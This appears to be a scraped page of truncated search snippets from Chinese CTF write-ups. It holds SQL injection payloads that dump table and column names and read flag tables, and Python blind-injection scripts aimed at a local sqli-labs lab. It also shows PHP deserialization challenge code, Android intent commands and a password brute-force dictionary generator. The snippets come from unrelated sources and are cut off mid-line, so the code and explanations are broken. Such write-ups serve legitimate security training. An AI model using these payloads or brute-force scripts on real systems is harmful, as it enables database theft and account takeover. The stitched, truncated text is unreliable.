resp = requests.get(payload) if "查询" in resp.text: result += chr(j) # ascii码 转为 字符 print(result) break print(result) %s表示字符串输入,%d表示整数输入,用i、j构造payload,通过查询库名,表名,列名,最后查询flag来逐步循环获取结果,sq...
payload:sElEct group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g' 爆出来了,就一个列flag 7.爆内容 下面爆内容 payload:sElEct 1,2,group_concat(flag) from 'fl4g' 发现这个老是报错…… 报错信息如下: string(167) "You have an error ...
// base64_encode() 使用 base64 对 ID 进行编码// 因此变量 correct 中存储的是运行时才能确定的未知量if($this->correct===$this->input){echofile_get_contents("/flag");// 但 correct 与 input 的值相同则输出 flag}}catch(Exception $e){}}} 代码的解析已置于注释中,由该类可以判断,要使程序...
//try to get flag13579.phpclassjust4fun{public$filename;function__toString(){return@file_get_contents($this->filename);}}$data=stripslashes($_GET['data']);if(!$data){die("hello from y");}$token=$data[0];$pass=true;switch($token){case'a':case'O':case'b':case'i':case'd':...
既然说选择神秘代码即可获得flag那就把1到5挨个点了边(虽然没指望flag真藏那里面但是先按照出题人想法来,看能不能找到些提示省些自己摸索的时间(实际上提示博主笨比一个都没察觉))。 (后知后觉这里首页面其实提示了要SQL盲注) 点击1到5号的结果。
select * from news where id='-1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database()#' 查询数据 select * from news where id='-1' union select flag,2 from flag#' 报错注入 通过sql语句报错的提示语句来进行sql注入 ...
Telegram Bot that keeps track and notificates subscribers about Capture The Flag competitions. telegram-botctfctftime UpdatedMay 21, 2024 Python 0xf4b1/ctftime Star10 Code Issues Pull requests My solutions for various CTF challenges ctf-writeupspwnctfctftime ...
import requests #global baseurl = 'http://127.0.0.1/sqli-labs/Less-5/' def get_databases(): for i in range(1,100): baseurl = 'http://127.0.0.1/sqli-labs/Less-5/' i=str(i) url=baseurl+'?id=1\' and (length(database()))='+i+' --+' #print url try: response = request...
am broadcast -W -a "com.wuhengctf.SET_FLAG" -n "com.bytectf.silverdroid/.FlagReceiver" -e 'flag' 'flag{eeeeeeee}' 2.adb_activity 通过intent传递url数据,下面可以通过-d选项来指定Intent data URI am start -a android.intent.action.VIEW -d https://www.baidu.com ...
尝试访问 flag 三、BUU BRUTE 1 打开靶场 F12 检查源代码没发现异常,输入 admin 密码为 123 提交试试 报错提示密码为四位数字,那么大概率用户名是对的(这里换其他用户名的话会提示用户名错误) 生成字典开始爆破 # 导入模块import itertools# 生成密码组合passwords = [''.join(i) for i in itertools.product...